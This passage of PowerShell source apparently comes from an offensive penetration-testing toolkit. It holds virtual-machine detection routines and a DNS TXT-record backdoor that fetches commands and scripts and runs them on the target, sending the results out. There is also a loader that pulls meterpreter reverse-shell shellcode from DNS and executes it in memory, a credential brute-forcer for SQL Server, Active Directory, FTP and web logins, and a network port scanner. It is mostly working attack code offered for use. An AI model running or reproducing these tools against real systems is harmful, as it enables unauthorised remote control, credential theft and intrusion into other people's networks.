919 $vmware = Get-Process
920 if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
921 {
922 $vmwarevm = $true
923 }
924 }
925
926 if ($vmwarevm)
927 {
928
929 "This is a VMWare machine."
930
931 }
932
933 #Virtual PC
934
935 $vpc = Get-Process
936 if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
937 {
938 $vpcvm = $true
939 }
940
941 if (!$vpcvm)
942 {
943 $vpc = Get-Process
944 if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
945 {
946 $vpcvm = $true
947 }
948 }
949
950 if (!$vpcvm)
951 {
952 $vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
953 if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
954 {
955 $vpcvm = $true
956 }
957 }
958
959 if ($vpcvm)
960 {
961
962 "This is a Virtual PC."
963
964 }
965
966
967 #Virtual Box
968
969 $vb = Get-Process
970 if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
971 {
972
973 $vbvm = $true
974
975 }
976 if (!$vbvm)
977 {
978 $vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
979 if ($vb -match "vbox_")
980 {
981 $vbvm = $true
982 }
983 }
984
985 if (!$vbvm)
986 {
987 $vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
988 if ($vb -match "vbox_")
989 {
990 $vbvm = $true
991 }
992 }
993
994
995 if (!$vbvm)
996 {
997 $vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
998 if ($vb -match "vbox")
999 {
1000 $vbvm = $true
1001 }
1002 }
1003
1004
1005
1006 if (!$vbvm)
1007 {
1008 $vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
1009 if ($vb -match "vbox")
1010 {
1011 $vbvm = $true
1012 }
1013 }
1014
1015
1016 if (!$vbvm)
1017 {
1018 $vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
1019 if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
1020 {
1021 $vbvm = $true
1022 }
1023 }
1024
1025 if ($vbvm)
1026 {
1027
1028 "This is a Virtual Box."
1029
1030 }
1031
1032
1033
1034 #Xen
1035
1036 $xen = Get-Process
1037
1038 if ($xen -eq "xenservice.exe")
1039 {
1040
1041 $xenvm = $true
1042
1043 }
1044
1045 if (!$xenvm)
1046 {
1047 $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
1048 if ($xen -match "xen")
1049 {
1050 $xenvm = $true
1051 }
1052 }
1053
1054 if (!$xenvm)
1055 {
1056 $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
1057 if ($xen -match "xen")
1058 {
1059 $xenvm = $true
1060 }
1061 }
1062
1063 if (!$xenvm)
1064 {
1065 $xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
1066 if ($xen -match "xen")
1067 {
1068 $xenvm = $true
1069 }
1070 }
1071
1072
1073 if (!$xenvm)
1074 {
1075 $xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
1076 if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
1077 {
1078 $xenvm = $true
1079 }
1080 }
1081
1082
1083 if ($xenvm)
1084 {
1085
1086 "This is a Xen Machine."
1087
1088 }
1089
1090
1091 #QEMU
1092
1093 $qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
1094 if ($qemu -match "qemu")
1095 {
1096
1097 $qemuvm = $true
1098
1099 }
1100
1101 if (!$qemuvm)
1102 {
1103 $qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
1104 if ($qemu -match "qemu")
1105 {
1106 $qemuvm = $true
1107 }
1108 }
1109
1110 if ($qemuvm)
1111 {
1112
1113 "This is a Qemu machine."
1114
1115 }
1116
1117}
1118
1119
1120#####################Acts as a backdoor and is capable of recieving commands and PowerShell scripts from DNS TXT queries.#####################
1121function DNS_TXT_Pwnage
1122{
1123
1124<#
1125.SYNOPSIS
1126A backdoor capable of recieving commands and PowerShell scripts from DNS TXT queries.
1127
1128.DESCRIPTION
1129This script continuously queries a domain's TXT records. It could be sent commands and powershell scripts using the TXT records which are executed on the target machine.
1130The PowerShell script which would be served as TXT record must be generated using Out-DnsTxt.ps1 in the Utility folder.
1131
1132While using the AuthNS option it should be kept in mind that it increases chances of detection.
1133Leaving the DNS resolution to authorised name server of a target environment may be more desirable.
1134
1135If using DNS or Webserver ExfilOption, use Invoke-Decode.ps1 in the Utility folder to decode the exfiltrated data.
1136
1137.PARAMETER startdomain
1138The domain (or subdomain) whose TXT records would be checked regularly for further instructions.
1139
1140.PARAMETER cmdstring
1141 The string, if responded by TXT record of startdomain, will make the payload query "commanddomain" for commands.
1142
1143.PARAMETER commanddomain
1144The domain (or subdomain) whose TXT records would be used to issue commands to the payload.
1145
1146.PARAMETER psstring
1147 The string, if responded by TXT record of startdomain, will make the payload query "psdomain" for encoded powershell script.
1148
1149.PARAMETER psdomain
1150The domain (or subdomain) whose subdomains would be used to provide powershell scripts from TXT records.
1151
1152.PARAMETER Arguments
1153Arguments to be passed to a script. Powerpreter and other scripts in Nishang need the function name and arguments here.
1154
1155.PARAMETER subdomains
1156The number of subdomains which would be used to provide powershell scripts from their TXT records.
1157The length of DNS TXT records is assumed to be 255 characters, so more than one subdomains would be required.
1158
1159.PARAMETER stopstring
1160The string, if responded by TXT record of startdomain, will stop this payload on the target.
1161
1162.PARAMETER AuthNS
1163Authoritative Name Server for the domains (or for startdomain in case you are using separate domains).
1164Startdomain would be changed for commands and an authoritative reply shoudl reflect changes immediately.
1165
1166
1167.EXAMPLE
1168PS > DNS_TXT_Pwnage
1169The payload will ask for all required options.
1170
1171.EXAMPLE
1172PS > DNS_TXT_Pwnage -StartDomain start.alteredsecurity.com -cmdstring begincommands -CommandDomain command.alteredsecurity.com -psstring startscript -PSDomain script.alteredsecurity.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -AuthNS ns8.zoneedit.com
1173In the above example if you want to execute commands. TXT record of start.alteredsecurity.com
1174must contain only "begincommands" and command.alteredsecurity.com should conatin a single command
1175you want to execute. The TXT record could be changed live and the payload will pick up updated
1176record to execute new command.
1177
1178To execute a script in above example, start.alteredsecurity.com must contain "startscript". As soon it matches, the payload will query
11791.script.alteredsecurity.com, 2.script.alteredsecurity.com and 3.script.alteredsecurity.com looking for a base64encoded powershell script.
1180Use the Arguments paramter if the downloaded script loads a function.
1181Use the Out-DnsTxt script in the Utility folder to encode scripts to base64.
1182
1183.EXAMPLE
1184PS > DNS_TXT_Pwnage -StartDomain start.alteredsecurity.com -cmdstring begincommands -CommandDomain command.alteredsecurity.com -psstring startscript -PSDomain script.alteredsecurity.com -Arguments Get-WLAN-Keys -Subdomains 3 -StopString stop -AuthNS ns8.zoneedit.com | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
1185Use above command for sending POST request to your webserver which is able to log the requests.
1186
1187.LINK
1188http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
1189https://github.com/samratashok/nishang
1190#>
1191
1192
1193 [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
1194
1195 [Parameter(Position = 0, Mandatory = $True)]
1196 [String]
1197 $startdomain,
1198
1199 [Parameter(Position = 1, Mandatory = $True)]
1200 [String]
1201 $cmdstring,
1202
1203 [Parameter(Position = 2, Mandatory = $True)]
1204 [String]
1205 $commanddomain,
1206
1207 [Parameter(Position = 3, Mandatory = $True)]
1208 [String]
1209 $psstring,
1210
1211 [Parameter(Position = 4, Mandatory = $True)]
1212 [String]
1213 $psdomain,
1214
1215 [Parameter(Position = 5, Mandatory = $False)]
1216 [String]
1217 $Arguments = "Out-Null",
1218
1219 [Parameter(Position = 6, Mandatory = $True)]
1220 [String]
1221 $Subdomains,
1222
1223 [Parameter(Position = 7, Mandatory = $True)]
1224
1225 [String]
1226 $StopString,
1227
1228 [Parameter(Position = 8, Mandatory = $True)]
1229 [String]$AuthNS,
1230
1231
1232 [Parameter()]
1233 [Switch]
1234 $NoLoadFunction
1235
1236 )
1237
1238 while($true)
1239 {
1240 $exec = 0
1241 start-sleep -seconds 5
1242 if ($AuthNS -ne $null)
1243 {
1244 $getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain $AuthNS")
1245 }
1246 else
1247 {
1248 $getcode = (Invoke-Expression "nslookup -querytype=txt $startdomain")
1249 }
1250 $tmp = $getcode | select-string -pattern "`""
1251 $startcode = $tmp -split("`"")[0]
1252 if ($startcode[1] -eq $cmdstring)
1253 {
1254 start-sleep -seconds 5
1255 if ($AuthNS -ne $null)
1256 {
1257 $getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain $AuthNS")
1258 }
1259 else
1260 {
1261 $getcommand = (Invoke-Expression "nslookup -querytype=txt $commanddomain")
1262 }
1263 $temp = $getcommand | select-string -pattern "`""
1264 $command = $temp -split("`"")[0]
1265 $pastevalue = Invoke-Expression $command[1]
1266 $pastevalue
1267 $exec++
1268 if ($exfil -eq $True)
1269 {
1270 $pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
1271 Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
1272 }
1273 if ($exec -eq 1)
1274 {
1275 Start-Sleep -Seconds 60
1276 }
1277 }
1278
1279 if ($startcode[1] -match $psstring)
1280 {
1281
1282 $i = 1
1283 while ($i -le $subdomains)
1284 {
1285 if ($AuthNS -ne $null)
1286 {
1287 $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$psdomain $AuthNS")
1288 }
1289 else
1290 {
1291 $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$psdomain")
1292 }
1293 $temp = $getcommand | select-string -pattern "`""
1294 $tmp1 = ""
1295 $tmp1 = $tmp1 + $temp
1296 $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
1297 $i++
1298 }
1299 #Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
1300 $dec = [System.Convert]::FromBase64String($encdata)
1301 $ms = New-Object System.IO.MemoryStream
1302 $ms.Write($dec, 0, $dec.Length)
1303 $ms.Seek(0,0) | Out-Null
1304 $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
1305 $sr = New-Object System.IO.StreamReader($cs)
1306 $command = $sr.readtoend()
1307 $pastevalue = Invoke-Expression $command
1308
1309 # Check for arguments to the downloaded script.
1310 if ($Arguments -ne "Out-Null")
1311 {
1312 $pastevalue = Invoke-Expression $Arguments
1313 }
1314
1315 $pastevalue
1316 $exec++
1317 if ($exfil -eq $True)
1318 {
1319 $pastename = $env:COMPUTERNAME + " Results of DNS TXT Pwnage: "
1320 Do-Exfiltration "$pastename" "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$ExfilNS"
1321 }
1322 if ($exec -eq 1)
1323 {
1324 Start-Sleep -Seconds 60
1325 }
1326
1327 }
1328
1329 if($startcode[1] -eq $StopString)
1330 {
1331 break
1332 }
1333 }
1334}
1335
1336#####################Execute shellcode in-memory. The shellcode is recieved from DNS TXT queries.#####################
1337
1338function Execute-DNSTXT-Code
1339{
1340
1341
1342<#
1343.SYNOPSIS
1344Payload which could execute shellcode from DNS TXT queries.
1345
1346.DESCRIPTION
1347This payload is able to pull shellcode from txt record of a domain.
1348Below commands could be used to generate shellcode to be usable with this script
1349./msfvenom -p windows/meterpreter/reverse_https -f powershell LHOST=<>
1350./msfvenom -p windows/x64/meterpreter/reverse_https -f powershell LHOST=<>
1351
1352To generate TXT records from above shellcode, use Out-DnsTxt.ps1 in the Utility folder.
1353
1354.PARAMETER shellcode32
1355The domain (or subdomain) whose subbdomain's TXT records would hold 32-bit shellcode.
1356
1357.PARAMETER shellcode64
1358The domain (or subdomain) whose subbdomain's TXT records would hold 64-bit shellcode.
1359
1360 .PARAMETER AUTHNS
1361Authoritative Name Server for the domains.
1362
1363.PARAMETER subdomains
1364The number of subdomains which would be used to provide shellcode from their TXT records.
1365
1366
1367.EXAMPLE
1368PS > Execute-DNSTXT-Code
1369The payload will ask for all required options.
1370
1371.EXAMPLE
1372PS > Execute-DNSTXT-Code 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com -SubDomains 5
1373Use above from non-interactive shell.
1374
1375.LINK
1376http://www.labofapenetrationtester.com/2015/01/fun-with-dns-txt-records-and-powershell.html
1377https://github.com/samratashok/nishang
1378
1379.NOTES
1380The code execution logic is based on this post by Matt.
1381http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
1382#>
1383
1384
1385 [CmdletBinding()] Param(
1386 [Parameter(Position = 0, Mandatory = $True)]
1387 [String]
1388 $ShellCode32,
1389
1390 [Parameter(Position = 1, Mandatory = $True)]
1391 [String]
1392 $ShellCode64,
1393
1394 [Parameter(Position = 2, Mandatory = $True)]
1395 [String]
1396 $AuthNS,
1397
1398 [Parameter(Position = 3, Mandatory = $True)]
1399 [String]
1400 $Subdomains
1401
1402 )
1403
1404 #Function to get shellcode from TXT records
1405 function Get-ShellCode
1406 {
1407 Param(
1408 [Parameter()]
1409 [String]
1410 $ShellCode
1411 )
1412 $i = 1
1413 while ($i -le $subdomains)
1414 {
1415 if ($AuthNS -ne $null)
1416 {
1417 $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$ShellCode $AuthNS")
1418 }
1419 else
1420 {
1421 $getcommand = (Invoke-Expression "nslookup -querytype=txt $i.$ShellCode")
1422 }
1423 $temp = $getcommand | select-string -pattern "`""
1424 $tmp1 = ""
1425 $tmp1 = $tmp1 + $temp
1426 $encdata = $encdata + $tmp1 -replace '\s+', "" -replace "`"", ""
1427 $i++
1428 }
1429 #Decode the downloaded powershell script. The decoding logic is of Invoke-Decode in Utility directory.
1430 $dec = [System.Convert]::FromBase64String($encdata)
1431 $ms = New-Object System.IO.MemoryStream
1432 $ms.Write($dec, 0, $dec.Length)
1433 $ms.Seek(0,0) | Out-Null
1434 $cs = New-Object System.IO.Compression.DeflateStream ($ms, [System.IO.Compression.CompressionMode]::Decompress)
1435 $sr = New-Object System.IO.StreamReader($cs)
1436 $sc = $sr.readtoend()
1437 return $sc
1438 }
1439 if ([IntPtr]::Size -eq 8)
1440 {
1441 $Shell64 = (Get-ShellCode $ShellCode64)
1442 #Remove unrequired things from msf shellcode
1443 $tmp = $Shell64 -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
1444 [Byte[]]$sc = $tmp -split ','
1445 }
1446 else
1447 {
1448 $shell32 = (Get-ShellCode $ShellCode32)
1449 $tmp = $Shell32 -replace "`n","" -replace '\$buf \+\= ',"," -replace '\[Byte\[\]\] \$buf \=' -replace " "
1450 [Byte[]]$sc = $tmp -split ','
1451 }
1452
1453 #Code Execution logic
1454 $code = @'
1455 [DllImport("kernel32.dll")]
1456 public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
1457 [DllImport("kernel32.dll")]
1458 public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
1459 [DllImport("msvcrt.dll")]
1460 public static extern IntPtr memset(IntPtr dest, uint src, uint count);
1461'@
1462 $winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
1463 $size = 0x1000
1464 if ($sc.Length -gt 0x1000) {$size = $sc.Length}
1465 $x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
1466 for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
1467 $winFunc::CreateThread(0,0,$x,0,0,0)
1468 while($True)
1469 {
1470 start-sleep -Seconds 100
1471 }
1472}
1473
1474
1475###############################################convert an executable to text file.#######################################################
1476function ExetoText
1477{
1478<#
1479.SYNOPSIS
1480Nishang script to convert an executable to text file.
1481
1482.DESCRIPTION
1483This script converts and an executable to a text file.
1484
1485.PARAMETER EXE
1486The path of the executable to be converted.
1487
1488.PARAMETER FileName
1489Path of the text file to which executable will be converted.
1490
1491.EXAMPLE
1492PS > ExetoText C:\binaries\evil.exe C:\test\evil.txt
1493
1494.LINK
1495http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
1496https://github.com/samratashok/nishang
1497#>
1498 [CmdletBinding()] Param(
1499 [Parameter(Position = 0, Mandatory = $True)]
1500 [String]
1501 $EXE,
1502
1503 [Parameter(Position = 1, Mandatory = $True)]
1504 [String]
1505 $Filename
1506 )
1507 [byte[]] $hexdump = get-content -encoding byte -path "$EXE"
1508 [System.IO.File]::WriteAllLines($Filename, ([string]$hexdump))
1509 Write-Output "Converted file written to $Filename"
1510}
1511
1512
1513
1514################################Performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.###########################
1515####Thanks Niklas Goude#####
1516###http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
1517
1518function Invoke-BruteForce
1519{
1520 <#
1521.SYNOPSIS
1522Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
1523
1524.DESCRIPTION
1525This payload can brute force credentials for SQL Server, ActiveDirectory, Web or FTP.
1526
1527.PARAMETER Computername
1528Specifies a SQL Server, Domain, FTP Site or Web Site.
1529
1530.PARAMETER UserList
1531Specify a list of users. If blank, trusted connection will be used for SQL and an error will be genrated for other services.
1532
1533.PARAMETER PasswordList
1534Specify a list of passwords.
1535
1536.PARAMETER Service
1537Enter a Service from SQL, ActiveDirecotry, FTP and Web. Default service is set to SQL.
1538
1539.PARAMETER StopOnSuccess
1540Use this switch to stop the brute forcing on the first success.
1541
1542.EXAMPLE
1543PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
1544Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt
1545
1546.EXAMPLE
1547PS > Invoke-BruteForce -ComputerName targetdomain.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service ActiveDirectory -StopOnSuccess -Verbose
1548Brute force a Domain Controller of targetdomain.com for users listed in users.txt and passwords in wordlist.txt.
1549Since StopOnSuccess is specified, the brute forcing stops on first success.
1550
1551.EXAMPLE
1552PS > cat C:\test\servers.txt | Invoke-BruteForce -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
1553Brute force SQL Service on all the servers specified in servers.txt
1554
1555.LINK
1556http://www.truesec.com
1557http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
1558https://github.com/samratashok/nishang
1559
1560.NOTES
1561Goude 2012, TreuSec
1562#>
1563 [CmdletBinding()] Param(
1564 [Parameter(Mandatory = $true, Position = 0, ValueFromPipeline=$true)]
1565 [Alias("PSComputerName","CN","MachineName","IP","IPAddress","Identity","Url","Ftp","Domain","DistinguishedName")]
1566 [String]
1567 $ComputerName,
1568
1569 [Parameter(Position = 1, Mandatory = $false)]
1570 [String]
1571 $UserList,
1572
1573 [Parameter(Position = 2, Mandatory = $false)]
1574 [String]
1575 $PasswordList,
1576
1577 [Parameter(Position = 3, Mandatory = $false)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
1578 [String]
1579 $Service = "SQL",
1580
1581 [Parameter(Position = 4, Mandatory = $false)]
1582 [Switch]
1583 $StopOnSuccess
1584 )
1585
1586 Process
1587 {
1588 $usernames = Get-Content $UserList
1589 $passwords = Get-Content $PasswordList
1590 #Brute force SQL Server
1591 $Connection = New-Object System.Data.SQLClient.SQLConnection
1592 function CheckForSQLSuccess
1593 {
1594 Try
1595 {
1596 $Connection.Open()
1597 $success = $true
1598 }
1599 Catch
1600 {
1601 $success = $false
1602 }
1603 if($success -eq $true)
1604 {
1605 Write-Output "Match found! $username : $Password"
1606 switch ($connection.ServerVersion) {
1607 { $_ -match "^6" } { "SQL Server 6.5";Break UsernameLoop }
1608 { $_ -match "^6" } { "SQL Server 7";Break UsernameLoop }
1609 { $_ -match "^8" } { "SQL Server 2000";Break UsernameLoop }
1610 { $_ -match "^9" } { "SQL Server 2005";Break UsernameLoop }
1611 { $_ -match "^10\.00" } { "SQL Server 2008";Break UsernameLoop }
1612 { $_ -match "^10\.50" } { "SQL Server 2008 R2";Break UsernameLoop }
1613 { $_ -match "^11" } { "SQL Server 2012";Break UsernameLoop }
1614 { $_ -match "^12" } { "SQL Server 2014";Break UsernameLoop }
1615 Default { "Unknown" }
1616 }
1617 }
1618 }
1619 if($service -eq "SQL")
1620 {
1621 Write-Output "Brute Forcing SQL Service on $ComputerName"
1622 if($userList)
1623 {
1624 :UsernameLoop foreach ($username in $usernames)
1625 {
1626 foreach ($Password in $Passwords)
1627 {
1628 $Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
1629 Write-Verbose "Checking $userName : $password"
1630 CheckForSQLSuccess
1631 }
1632 }
1633 }
1634 else
1635 {
1636 #If no username is provided, use trusted connection
1637 $Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
1638 CheckForSQLSuccess
1639
1640 }
1641 }
1642
1643 #Brute Force FTP
1644 elseif ($service -eq "FTP")
1645 {
1646 if($ComputerName -notMatch "^ftp://")
1647 {
1648 $source = "ftp://" + $ComputerName
1649 }
1650 else
1651 {
1652 $source = $ComputerName
1653 }
1654 Write-Output "Brute Forcing FTP on $ComputerName"
1655
1656 :UsernameLoop foreach ($username in $usernames)
1657 {
1658 foreach ($Password in $Passwords)
1659 {
1660 try
1661 {
1662 $ftpRequest = [System.Net.FtpWebRequest]::Create($source)
1663 $ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
1664 Write-Verbose "Checking $userName : $password"
1665 $ftpRequest.Credentials = new-object System.Net.NetworkCredential($userName, $password)
1666 $result = $ftpRequest.GetResponse()
1667 $message = $result.BannerMessage + $result.WelcomeMessage
1668 Write-Output "Match found! $username : $Password"
1669 $success = $true
1670 if ($StopOnSuccess)
1671 {
1672 break UsernameLoop
1673 }
1674 }
1675
1676 catch
1677 {
1678 $message = $error[0].ToString()
1679 $success = $false
1680 }
1681 }
1682 }
1683 }
1684
1685 #Brute Force Active Directory
1686 elseif ($service -eq "ActiveDirectory")
1687 {
1688 Write-Output "Brute Forcing Active Directory $ComputerName"
1689 Add-Type -AssemblyName System.DirectoryServices.AccountManagement
1690 $contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
1691 Try
1692 {
1693 $principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $ComputerName)
1694 $success = $true
1695 }
1696 Catch
1697 {
1698 $message = "Unable to contact Domain"
1699 $success = $false
1700 }
1701 if($success -ne $false)
1702 {
1703 :UsernameLoop foreach ($username in $usernames)
1704 {
1705 foreach ($Password in $Passwords)
1706 {
1707 Try
1708 {
1709 Write-Verbose "Checking $userName : $password"
1710 $success = $principalContext.ValidateCredentials($username, $password)
1711 $message = "Password Match"
1712 if ($success -eq $true)
1713 {
1714 Write-Output "Match found! $username : $Password"
1715 if ($StopOnSuccess)
1716 {
1717 break UsernameLoop
1718 }
1719 }
1720 }
1721 Catch
1722 {
1723 $success = $false
1724 $message = "Password doesn't match"
1725 }
1726 }
1727 }
1728 }
1729 }
1730 #Brute Force Web
1731 elseif ($service -eq "Web")
1732 {
1733 if ($ComputerName -notMatch "^(http|https)://")
1734 {
1735 $source = "http://" + $ComputerName
1736 }
1737 else
1738 {
1739 $source = $ComputerName
1740 }
1741 :UsernameLoop foreach ($username in $usernames)
1742 {
1743 foreach ($Password in $Passwords)
1744 {
1745 $webClient = New-Object Net.WebClient
1746 $securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
1747 $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
1748 $webClient.Credentials = $credential
1749 Try
1750 {
1751 Write-Verbose "Checking $userName : $password"
1752 $source
1753 $webClient.DownloadString($source)
1754 $success = $true
1755 $success
1756 if ($success -eq $true)
1757 {
1758 Write-Output "Match found! $Username : $Password"
1759 if ($StopOnSuccess)
1760 {
1761 break UsernameLoop
1762 }
1763 }
1764 }
1765 Catch
1766 {
1767 $success = $false
1768 $message = "Password doesn't match"
1769 }
1770 }
1771 }
1772 }
1773 }
1774}
1775
1776
1777
1778#########################################Scan IP-Addresses, Ports and HostNames############################################################
1779####Thanks Niklas Goude#####
1780function Invoke-PortScan {
1781
1782<#
1783.SYNOPSIS
1784Nihsang payload which Scan IP-Addresses, Ports and HostNames
1785
1786.DESCRIPTION
1787Scan for IP-Addresses, HostNames and open Ports in your Network.
1788
1789.PARAMETER StartAddress
1790StartAddress Range
1791
1792.PARAMETER EndAddress
1793EndAddress Range
1794
1795.PARAMETER ResolveHost
1796Resolve HostName
1797
1798.PARAMETER ScanPort
1799Perform a PortScan
1800
1801.PARAMETER Ports
1802Ports That should be scanned, default values are: 21,22,23,53,69,71,80,98,110,139,111,
1803389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,
18045801,5900,5555,5901
1805
1806.PARAMETER TimeOut
1807Time (in MilliSeconds) before TimeOut, Default set to 100
1808
1809.EXAMPLE
1810Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
1811
1812.EXAMPLE
1813Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
1814
1815.EXAMPLE
1816Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
1817
1818.EXAMPLE
1819Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
1820
1821.EXAMPLE
1822Invoke-PortScan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
1823
1824.LINK
1825http://www.truesec.com
1826http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
1827https://github.com/samratashok/nishang
1828
1829.NOTES
1830Goude 2012, TrueSec
1831#>
1832
1833
1834[CmdletBinding()] Param(
1835 [parameter(Mandatory = $true,
1836 Position = 0)]
1837 [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
1838 [string]$StartAddress,
1839 [parameter(Mandatory = $true,
1840 Position = 1)]
1841 [ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
1842 [string]$EndAddress,
1843 [switch]$ResolveHost,
1844 [switch]$ScanPort,
1845 [int[]]$Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
1846 [int]$TimeOut = 100
1847 )
1848
1849 Begin {
1850 $ping = New-Object System.Net.Networkinformation.Ping
1851 }
1852 Process {
1853 foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
1854 foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
1855 foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
1856 foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
1857 write-progress -activity PingSweep -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100)
1858 $pingStatus = $ping.Send("$a.$b.$c.$d",$TimeOut)
1859 if($pingStatus.Status -eq "Success") {
1860 if($ResolveHost) {
1861 write-progress -activity ResolveHost -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100) -Id 1
1862 $getHostEntry = [Net.DNS]::BeginGetHostEntry($pingStatus.Address, $null, $null)
1863 }
1864 if($ScanPort) {
1865 $openPorts = @()
1866 for($i = 1; $i -le $ports.Count;$i++) {
1867 $port = $Ports[($i-1)]
1868 write-progress -activity PortScan -status "$a.$b.$c.$d" -percentcomplete (($i/($Ports.Count)) * 100) -Id 2
1869 $client = New-Object System.Net.Sockets.TcpClient
1870 $beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
1871 if($client.Connected) {
1872 $openPorts += $port
1873 } else {
1874 # Wait
1875 Start-Sleep -Milli $TimeOut
1876 if($client.Connected) {
1877 $openPorts += $port
1878 }
1879 }
1880 $client.Close()
1881 }
1882 }
1883 if($ResolveHost) {
1884 $hostName = ([Net.DNS]::EndGetHostEntry([IAsyncResult]$getHostEntry)).HostName
1885 }
1886 # Return Object
1887 New-Object PSObject -Property @{
1888 IPAddress = "$a.$b.$c.$d";
1889 HostName = $hostName;
1890 Ports = $openPorts
1891 } | Select-Object IPAddress, HostName, Ports
1892 }
1893 }
1894 }
1895 }
1896 }
1897 }
1898 End {
1899 }
1900}
1901
1902############################################################Convert a plain string to Base64 encoding.####################################
1903function StringtoBase64
1904{
1905
1906
1907<#
1908.SYNOPSIS
1909Helper function which encodes a string to base64 string.
1910
1911.DESCRIPTION
1912This payload encodes the given string to base64 string and writes it to base64encoded.txt in current directory.
